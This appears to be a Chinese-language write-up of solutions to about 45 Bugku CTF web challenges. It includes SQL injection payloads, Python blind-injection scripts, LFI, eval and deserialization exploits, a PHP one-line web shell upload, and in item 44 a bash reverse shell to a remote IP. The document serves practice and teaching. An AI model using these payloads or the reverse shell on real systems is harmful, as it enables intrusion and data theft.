bugku web题

1.web2

直接查看网页源代码

2.计算器

差不多,不过flag在 js/code.js 里面

3.WEB基础$_GET

代码:

1
2
3
4
5
$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';
flagflag{bugku_get_su8kej2en}

链接后面加what = flag

http://123.206.87.240:8002/get/?what=flag

4.WEB基础$_POST

代码

1
2
3
4
$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

利用火狐浏览器,发送post数据

5.矛盾

该题利用php解析数字的时候只取前面的数字,丢弃后面的字母。

源代码:

1
2
3
4
5
6
7
$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}

访问 :http://123.206.87.240:8002/get/index1.php?num=1x

1x并不是个数字,所以能进if判断,接续的时候$num被转换成了1,所以通过验证,输出flag

6.web3

直接火狐浏览器打开,一直alert,火狐自动阻止,然后查看网页源代码,看到html编码的一串字符:

1
<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->

该编码是html编码,直接转换出flag

7.域名解析

该题比较简单,将C://windows//system32//drivers//etc//hosts 里面添加一条解析记录:

123.206.87.240 flag.baidu.com

然后访问 flag.baidu.com 即可得到flag

8.必须让他停下来

使用谷歌浏览器,查看页面,右键查看源代码,然后在该页面不断刷新,指导看到flag未为止。

9.本地文件包含

代码:

1
2
3
4
5
6
<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

eval 是动态执行代码,所传递给eval的值都会被当成代码执行,一句话木马就是利用该语句。(assert也一样)

所以我们构造一个这样的语句:

var_dump(file_get_contents(“flag.php”));

来获取flag,由于他已经在eval里面写好不然代码,所以我们的语句为:

file_get_contents(“flag.php”)

传入url:http://123.206.87.240:8003/?hello=file_get_contents(%22flag.php%22)

或者直接使用file函数来读取:

传入url:http://123.206.87.240:8003/?hello=file(%22flag.php%22)

右键查看网页源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
string(84) "<?php
$flag = 'Too Young Too Simple';
# echo $flag;
# flag{bug-ctf-gg-99};
?>"
<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">include&nbsp;</span><span style="color: #DD0000">"flag.php"</span><span style="color: #007700">;
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$a&nbsp;</span><span style="color: #007700">=&nbsp;@</span><span style="color: #0000BB">$_REQUEST</span><span style="color: #007700">[</span><span style="color: #DD0000">'hello'</span><span style="color: #007700">];
<br />&nbsp;&nbsp;&nbsp;&nbsp;eval(&nbsp;</span><span style="color: #DD0000">"var_dump(</span><span style="color: #0000BB">$a</span><span style="color: #DD0000">);"</span><span style="color: #007700">);
<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">show_source</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);
<br /></span><span style="color: #0000BB">?&gt;</span>
</span>
</code>

10.变量1

代码:

1
2
3
4
5
6
7
8
9
10
11
12
flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
?>

可以看到 eval里面的参数前面有2个$ ,当 args = GLOBALS 的时候,就变成了 :
var_dump($GLOBALS)
得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
flag In the variable ! <?php
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);");
}
?>
array(7) { ["GLOBALS"]=> *RECURSION* ["_POST"]=> array(0) { } ["_GET"]=> array(1) { ["args"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(0) { } ["_FILES"]=> array(0) { } ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}" ["args"]=> string(7) "GLOBALS" }

11.web5

JSFUCK 直接丢到控制台:

然后根据提示,全部大写即可。

12.头等舱

burp抓包,发送到repeat

重新发包,拿到flag

13.网站被黑

1.御剑扫描,得到后台地址 shell.php

2.burp 暴力密码破解得到 hack

14.管理员系统

步骤一,抓包,添加 x-forwarded-for: 127.0.0.1,伪造IP

步骤二,查看网页源代码,底部,解BASE64得到密码test123

伪造ip登录获取flag

15.web4

将url编码拼接解码:

1
2
3
4
5
6
7
8
9
10
function checkSubmit(){
var a=document.getElementById("password");
if("undefined"!=typeofa){
if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;
alert("Error");
a.focus();
return!1
}
}
document.getElementById("levelQuest").onsubmit=checkSubmit;

输入内容得到flag

16.flag在index里

本地文件包含漏洞,构造参数:

file=php://filter/read=convert.base64-encode/resource=./index.php

将index.php以base64编码的形式转换出来,然后解码得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<html>
<title>Bugku-ctf</title>

<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

17.输入密码查看flag

使用burp intruder 工具爆破口令,得到密码为13579

18.点击100万次

F12 调出 console ,输入 clicks=999999,然后鼠标点击一次,得到flag

19.备份是个好习惯

使用SourceLeakHacker爆破出备份文件路径

http://123.206.87.240:8002/web16/index.php.bak

拿到文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
/**
* Created by PhpStorm.
* User: Norse
* Date: 2017/8/6
* Time: 20:22
*/
include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
echo $flag."取得flag";
}
?>

1.先绕过key替换成’’

方法1:利用php的md5函数关于数组的处理方式利用:

http://123.206.87.240:8002/web16/?kkeyey1[]=123&kkeyey2[]=456

进行md5的时候默认会把数组变成null来计算md5

方法2.利用php对格式转换的方式绕过:

使用哈希值为0E开头的字符串,常见的字符串有这几种

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

由于题目采用==号比较,以上几个字符创的hash都是0e开头,被认为以科学计数法计算,0e表示0的多少次方,结果都是0,所以绕过了==判断

20.成绩单

尝试注入 id=-1’ union select 1,2,3,4# 成功

爆表名:
id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆列名:
id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

爆结果:
id=-1’ union select 1,2,3,skctf_flag from fl4g#

21.秋名山老司机

编写一下脚本

1
2
3
4
5
6
7
8
9
import requests
import re
web = requests.session()
s = web.get("http://123.206.87.240:8002/qiumingshan/")
complet = re.compile("<div>(.*?)</div>")
res = complet.findall(str(s.content))
print(eval(res[0][0:-3]))
r = web.post("http://123.206.87.240:8002/qiumingshan/",data = {"value":eval(res[0][0:-3])})
print(r.content)

22.速度要快

编写脚本:与时间赛跑.py

1
2
3
4
5
6
7
8
9
10
11
import requests
import re
import base64
web = requests.session()
s = web.get("http://123.206.87.240:8002/web6/")
s1 = str(base64.b64decode(s.headers['flag']),encoding="utf-8")
s2 = s1.split(": ")
print(s2[1])
margin = str(base64.b64decode(s2[1]),encoding="utf-8")
s3 = web.post("http://123.206.87.240:8002/web6/",data={"margin":margin})
print(str(s3.content,encoding="utf-8"))

23.cookie欺骗

打开网站发现url有2个参数,line和filename.
filename是base64解码,发现是keys.txt
用base64加密index.php发现只有一行,写脚本将index.php读出:

1
2
3
4
5
6
7
8
9
import requests
import re
import base64
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=aW5kZXgucGhw"
for i in range(60):
url = url1 +str(i) +url2
s = requests.get(url)
print(str(s.content,encoding="utf-8"))

得到源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

分析代码,编写利用脚本:

1
2
3
4
5
6
7
8
9
10
11
import requests
import re
import base64
url1 = "http://123.206.87.240:8002/web11/index.php?line="
url2 = "&filename=a2V5cy5waHA="
web = requests.session()
cookie = {"margin":"margin"}
for i in range(60):
url = url1 +str(i) +url2
s = web.get(url,cookies=cookie)
print(str(s.content,encoding="utf-8"))

24.never give up

查看提示1p.html,访问后跳转,burp抓包:

1
2
var Words ="%3Cscript%3Ewindow.location.href%3D%27http%3A//www.bugku.com%27%3B%3C/script%3E%20%0A%3C%21--JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyOSUzQiUwQSUwOWV4aXQlMjglMjklM0IlMEElN0QlMEElMjRpZCUzRCUyNF9HRVQlNUIlMjdpZCUyNyU1RCUzQiUwQSUyNGElM0QlMjRfR0VUJTVCJTI3YSUyNyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJTI3YiUyNyU1RCUzQiUwQWlmJTI4c3RyaXBvcyUyOCUyNGElMkMlMjcuJTI3JTI5JTI5JTBBJTdCJTBBJTA5ZWNobyUyMCUyN25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJTI3JTNCJTBBJTA5cmV0dXJuJTIwJTNCJTBBJTdEJTBBJTI0ZGF0YSUyMCUzRCUyMEBmaWxlX2dldF9jb250ZW50cyUyOCUyNGElMkMlMjdyJTI3JTI5JTNCJTBBaWYlMjglMjRkYXRhJTNEJTNEJTIyYnVna3UlMjBpcyUyMGElMjBuaWNlJTIwcGxhdGVmb3JtJTIxJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuJTI4JTI0YiUyOSUzRTUlMjBhbmQlMjBlcmVnaSUyOCUyMjExMSUyMi5zdWJzdHIlMjglMjRiJTJDMCUyQzElMjklMkMlMjIxMTE0JTIyJTI5JTIwYW5kJTIwc3Vic3RyJTI4JTI0YiUyQzAlMkMxJTI5JTIxJTNENCUyOSUwQSU3QiUwQSUwOXJlcXVpcmUlMjglMjJmNGwyYTNnLnR4dCUyMiUyOSUzQiUwQSU3RCUwQWVsc2UlMEElN0IlMEElMDlwcmludCUyMCUyMm5ldmVyJTIwbmV2ZXIlMjBuZXZlciUyMGdpdmUlMjB1cCUyMCUyMSUyMSUyMSUyMiUzQiUwQSU3RCUwQSUwQSUwQSUzRiUzRQ%3D%3D--%3E"
function OutWord()

得到这么一串代码,解码后得到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
";if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
require("f4l2a3g.txt");
}
else
{
print "never never never give up !!!";
}
?>

访问:http://123.206.87.240:8006/test/f4l2a3g.txt 得到flag

25.welcome to bugkuctf

访问看到代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
you are not the number of bugku !

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->

关键点:

php://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data

所以构造数据:
txt=php://input&file=php://filter/read=convert.base64-encode/resource=./hint.php&password=3
得到hint.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>

将hint.php换成flag.php发现一个乱码

我们看一下index.php的源代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php
$txt = $_GET["txt"];
$file = $_GET["file"];
$password = $_GET["password"];

if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){
echo "hello friend!<br>";
if(preg_match("/flag/",$file)){
echo "不能现在就给你flag哦";
exit();
}else{
include($file);
$password = unserialize($password);
echo $password;
}
}else{
echo "you are not the number of bugku ! ";
}

?>

<!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];

if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}else{
echo "you are not admin ! ";
}
-->

判断该乱码可能是 echo “不能现在就给你flag哦”;

发现如果文件不包含flag就会到else里面,一个典型的反序列化漏洞:

构造反序列化漏洞代码:

1
2
3
4
5
6
7
8
9
10
<?php
class Flag{
public $file;
}

$a = new Flag();
$a->file = "flag.php";
$a = serialize($a);
print_r($a);
?>

访问:123.206.87.240:8006/test1/?txt=php://input&file=hint.php&password=O:4:”Flag”:1:{s:4:”file”;s:8:”flag.php”;}
post = welcome to the bugkuctf 得到flag

26.过狗一句话

利用该函数,扫描目录:

print_r(scandir(%27./%27));

发现f14g.txt

http://123.206.87.240:8010/?s=print_r(file_get_contents(%22f14g.txt%22));

得到flag

27.正则表达式

按照规则构造正则表达式:id=/key123key12345key:/2/123keya:/i 即可得到flag

28.前女友

该题考查md5函数使用数组方式绕过,或者==和!=的方式可以用特殊的md5产生0e字符串来绕过,以上前面的题目已经遇到过了,所以直接拿来用,重点在于strcmp函数也可以用数组方式绕过:

?v1=QNKCDZO&v2=240610708&v3[]=0

29.login

得到提示是sql约束攻击,一脸懵逼,打开网页看看。

百度学习了之后发现,在SQL中执行字符串处理时,字符串末尾的空格符将会被删除。也就是说“admin”=“adin ”,我们注册个账号“admin ”之后登陆,即可拿到flag

提高,若字段设置为25长度。

‘vampire 1’ 构造25个空格的用户名,注册后即可使用vampire登陆

30.are you from google

burp抓包,添加Referer字段:

Referer: https://www.google.com

然后访问,即可拿到flag

31.md5 collision(NUPT_CTF)

md5碰撞,还是之前的套路,用md5值为0e开头的值传进去。

a=s1091221200a

32.程序员本地网站

比14题还简单,加一条:x-forwarded-for: 127.0.0.1

33.各种绕过

第一步,margin转url编码传递给id
第二步利用数组绕过hash检测

view-source:http://123.206.31.85:49162/?v1=QNKCDZO&v2=240610708&v3[]=0
post :passwd[]=122

34.web8

之前其实做过,后来又忘了,该漏洞给利用 php://input 吸收post参数:

http://123.206.87.240:8002/web8/?ac=123&fn=php://input

post: 123

35.细心

第一步:访问robots.txt

发现:

User-agent: *
Disallow: /resusl.php

访问提示不是管理员,IP已被记录。
x-forwarded-for: 127.0.0.1
client-ip: 127.0.0.1
都用上测试,不对,然后查看源代码,构造 x=admin 得到flag

36.求getshell

1.Content-Type: Multipart/form-data; 这里用大小写绕过就是M大写
2.拓展名改为.php5
3.文件名下面加:Content-Type: image/jpeg

37.insert into 注入

由于没有回显,只能使用盲注,盲注有一下3种类型:

1.基于布尔型SQL盲注

2.基于时间型SQL盲注

3.基于报错型SQL盲注

这里只能使用基于时间的盲注。

有3个函数在注入过程中一直被使用:

1.mid()函数
mid(striing,start,length)
string(必需)规定要返回其中一部分的字符串。
start(必需)规定开始位置(起始值是 1)。
length(可选)要返回的字符数。如果省略,则 mid() 函数返回剩余文本。

2.substr()函数
substr(string,start,length)
string(必需)规定要返回其中一部分的字符串。
start(必需)规定在字符串的何处开始。
length(可选)规定被返回字符串的长度。

3.left()函数
left(string,length)

使用 case when 表达式 then 表达式 else 表达式 end 的方式的来进行基于时间的盲注。

构造一段代码先测试一下:

x-forwarded-for: 1’ and (case when 1=1 then sleep(10) else 1 end ) )#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>

执行sql语句:insert into client_ip (ip) values (‘1’) and sleep(50) # ‘)

参考:

1
2
3
4
5
6
7
8
9
10
UNION SELECT 1,database(),3
UNION SELECT 1,version(),3
UNION SELECT 1,user(),3
UNION SELECT 1,2,group_concat(schema_name) from information_schema.schemata
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=''
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=''
UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()
UNION SELECT 1,2,group_concat(column_name) from information_schema.columns where table_schema=''

client_ipflag

client0000flag
000ipflag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests
import time
url = "http://123.206.87.240:8002/web15/"





if __name__ == '__main__':

'''db_len = 0
for i in range(1,100):
headers = {'x-forwarded-for': "1' and ( case when( length( ( select database()) )="+str(i)+" ) then sleep(2) else 1 end))#'"}
try:
s = requests.get(url,headers=headers,timeout=1)
#print(s.content)
except:
print("DB长度为:"+str(i))
db_len = i
break'''
for i in range(1,33):
for q in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*.":
# 数据库名 headers = {'x-forwarded-for': "1' and ( case when( (substr( (select database() ) from "+str(i)+" for 1 ))='" + q + "' ) then sleep(3) else 1 end))#'"}
#headers = {'x-forwarded-for': "1' and ( case when( (substr( ( SELECT group_concat(table_name) from information_schema.tables where table_schema=database() ) from "+str(i)+" for 1 ))='" + q + "' ) then sleep(3) else 1 end))#'"}
#headers = {'x-forwarded-for': "1' and ( case when( (substr( ( SELECT group_concat(column_name) from information_schema.columns where table_schema=database() ) from " + str(i) + " for 1 ))='" + q + "' ) then sleep(3) else 1 end))#'"}
headers = {'x-forwarded-for': "1' and ( case when( (substr( ( SELECT flag from flag ) from " + str(i) + " for 1 ))='" + q + "' ) then sleep(2) else 1 end))#'"}
a1 = ""
a2 = ""
a3 = ""
try:
s1 = requests.get(url, headers=headers, timeout=1)
#print(s.content)
except:
a1 = str(q)
try:
s2 = requests.get(url, headers=headers, timeout=1)
# print(s.content)
except:
a2 = str(q)
try:
s3 = requests.get(url, headers=headers, timeout=1)
# print(s.content)
except:
a3 = str(q)
if not a1 == "":
print(str(i),":",str(a1),":",str(a2),":",str(a3),)
time.sleep(2)
break;

# cdbf14c9551d5be5612f7bb5d2867853
# 16 18 20

编写以上脚本,获取flag

38.这是一个神奇的登陆框

这题使用sqlmap进行注入,先用burp抓包,保存到文件123.txt

python2 sqlmap.py -r “C:\Users\heiyi\Desktop\sqlmap-master\123.txt” -p admin_name —dbs 查数据库
python2 sqlmap.py -r “C:\Users\heiyi\Desktop\sqlmap-master\123.txt” -p admin_name -D bugkusql1 -tables 查表
python2 sqlmap.py -r “C:\Users\heiyi\Desktop\sqlmap-master\123.txt” -p admin_name -D bugkusql1 -T flag1 —dump 查数据

-r 是从文件中读取数据。

39.多次

首先测试注入,多尝试使用 —+ — # 等注释符号进行注释,确定存在注入。

使用or 1=1 发现元素被过滤。

使用异或注入测试被过滤的字符,方法:

http://123.206.87.240:9004/1ndex.php?id=1'^(length("union")!=0) —+

如果 length(“union”)!=0 则id=0,页面不正常, 反之,若union没有被过滤,则页面不正常。

测试发现:and,or,union,select 四个元素被过滤,通过双写来绕过

绕过后得到flag 测试不对,结果发现在address字段里面保存有下一关的地址:

http://123.206.87.240:9004/Once_More.php?id=1

同样是个注入页面

手动测试后编写脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import time

if __name__ == '__main__':
sss = ""
for i in range(1,50):
# url = "http://123.206.87.240:9004/Once_More.php?id=1'^( case when( mid((SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(i)+",1)>'"+chr(q)+"' ) then 1 else 0 end) --+"
#FLAG2
#url = "http://123.206.87.240:9004/Once_More.php?id=1'^( case when( mid((SELECT group_concat(column_name) from information_schema.columns where table_schema=database()),"+str(i)+",1)>'"+chr(q)+"' ) then 1 else 0 end) --+"
#ID,NAME,FLAG2,ADDRE
url = "http://123.206.87.240:9004/Once_More.php?id=1'^( case when( mid((SELECT group_concat(FLAG2) from flag2)," + str(i) + ",1)>'" + chr(q) + "' ) then 1 else 0 end) --+"
# ID,NAME,FLAG2,ADDRE
try:
s1 = requests.get(url, timeout=1)
# print (s1.content)
if "Hello" in str(s1.content,encoding="utf-8"):
sss = sss + chr(q)
print (sss)
break
except:
print ("error")

按照要求 全部变小写,最坑的是I,长得跟l一样 没认出来。别人的做法:

方式1:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import requests

def length_schema():
for x in range(1,20):
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20length(database())='+str(x)+'%23'
s = requests.get(url)
if "Hello" in s.text:
print 'schema_length is :' + str(x)
global a
a = int(x)
break

def schema_name():
x = 0
name = ''
while x < a:
x = x + 1
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
for i in temp:
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20mid(database(),'+ str(x) +',1)=%27'+str(i)+'%27%23'
s = requests.get(url)
if "Hello" in s.text:
name = name + str(i)

print 'sechma_name is :' + name
global schema_name
schema_name = name

def all():
temp = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~'
temp_data = 'abcdefghijklmnopqrstuvwxyz0123456789!@$%^&*()_+=-|}{:?><[];,.`~ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for x in xrange(0,20):
table_name = ''
for y in xrange(1,20):
key = 0
for i in temp:
url = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20table_name%20from%20information_schema.tables%20where%20table_schema=%27'+schema_name+'%27%20limit%20'+str(x)+',1),'+str(y)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url)
if "Hello" in s.text:
key = 1
table_name = table_name + str(i)
if key == 0:
break
if table_name == '':
break
print 'one of tables is:' + table_name
for p in xrange(0,20):
column_name = ''
for q in xrange(1,20):
key = 0
for i in temp:
url_columns = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27'+schema_name+'%27%20and%20table_name=%27'+table_name+'%27limit%20'+str(p)+',1),'+str(q)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url_columns)
if "Hello" in s.text:
key = 1
column_name = column_name + str(i)
if key ==0:
break
if column_name == '':
break
print 'a column name of '+table_name+' is '+column_name
for y in xrange(0,10):
data = ''
for z in xrange(1,20):
key = 0
for i in temp_data:
url_data = 'http://120.24.86.145:9004/Once_More.php?id=1%27and%20ascii(mid((select%20'+column_name+'%20from%20`'+schema_name+'`.'+table_name+'%20limit%20'+str(y)+',1),'+str(z)+',1))=ascii(\''+str(i)+'\')%23'
s = requests.get(url_data)
if "Hello" in s.text:
data = data + str(i)
key = 1
if key == 0:
break
if data == '':
break
print 'one data of '+schema_name+'.'+table_name+'\'s '+column_name+' is '+data

def main():
length_schema()
schema_name()
all()
if __name__ == '__main__':
main()

学习点:使用ascii 函数能将数字转ascii

方式二:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 查表
http://120.24.86.145:9004/Once_More.php?id=1' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~class,flag2~'

# 查字段
?id=1' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag2'),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~flag2,address~'

# 查数据
?id=1' and updatexml(1,concat('~',(select flag2 from flag2),'~'),3) %23
# 结果
Nobody!
XPATH syntax error: '~flag{Bugku-sql_6s-2i-4t-bug}~'

updatexml 方式报错输出,新技能get。

40.PHP_encrypt_1(ISCCCTF)

根据题意编写解码代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<?php

$str = "fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=";
function encrypt($data,$key)
{
$key = md5('ISCC');
$x = 0;
$len = strlen($data);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
$str .= chr((ord($data[$i]) + ord($char[$i])) % 128);
}
return base64_encode($str);
}

function decrypt($str){
$str = base64_decode($str);
$key = md5('ISCC');
$x = 0;
$char = "";
$str1 = "";
$len = strlen($str);
$klen = strlen($key);
for ($i=0; $i < $len; $i++) {
if ($x == $klen)
{
$x = 0;
}
$char .= $key[$x];
$x+=1;
}
for ($i=0; $i < $len; $i++) {
if( (ord($str[$i])- ord($char[$i])) <0){
$str1 .= chr(ord($str[$i]) + 128 - ord($char[$i]));
}else{

$str1 .= chr((ord($str[$i]) - ord($char[$i])));
}
}
return $str1;
}

$str1 = decrypt($str);
echo $str1;

?>

41.文件包含2

1.查看网页源代码,发现upload.php
2.构造 1.php;.jpg 上传文件,发现文件被重命名为.jpg
3.发现是文件包含漏洞,view-source:http://123.206.31.85:49166/index.php?file=./upload/201812050156179400.jpg 访问图片得到一句话页面
4.发现一句话被过滤 <?php 和 ?> 都被替换成_ ,因此构造特殊一句话木马:<?= @eval($_GET[c]) ;>
5.采用新的php格式: 连接得到flag

42.flag.php

  1. 考察get参数,第一关就凉了 :http://123.206.87.240:8002/flagphp/?hint=123
    得到代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    <?php
    error_reporting(0);
    include_once("flag.php");
    $cookie = $_COOKIE['ISecer'];
    if(isset($_GET['hint'])){
    show_source(__FILE__);
    }
    elseif (unserialize($cookie) === "$KEY")
    {
    echo "$flag";
    }
    else {
    ?>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="admin.css" type="text/css">
    </head>
    <body>
    <br>
    <div class="container" align="center">
    <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
    </form>
    </div>
    </body>
    </html>

    <?php
    }
    $KEY='ISecer:www.isecer.com';
    ?>

以为key要等于那个字符串,结果发现太年轻 根本就没定义。。

构造Cookie: ISecer=s:0:”” 得到flag

42.sql注入2

该题考验的泄露类题型,使用DS_Store即可找到泄漏的源码。

43.trim的日记本

这题用御剑扫一下,访问 show.php 得到flag

44.LOGIN2(SKCTF)

抓包,返回结果有tip,解密得到代码

1
2
3
$sql="SELECT username,password FROM admin WHERE username='".$username."'";
if (!empty($row) && $row['password']===md5($password)){
}

‘ union select md5(1),md5(1) #
1

登录后在自己服务器使用nc监听端口:

nc -l -p 8080 -vvv

在页面输入以下指令,将bash反弹至服务器的8080端口,

|bash -i >& /dev/tcp/111.111.11.12/8080 0>&1

服务器实际执行的命名:

ps -aux | grep |bash -i >& /dev/tcp/111.111.11.12/8080 0>&1

将bash的输出转到远程服务器端口,同时将远程输入传递到本地,形成一个链接。

ls后使用cat命令获取flag

45.login3(skctf)

使用 admin’^(length(‘and’))^1 # 来进行测试

测试结果如下:

非法字符

information_schema

and 空格 ,

可用字符

or mid substr

select case when

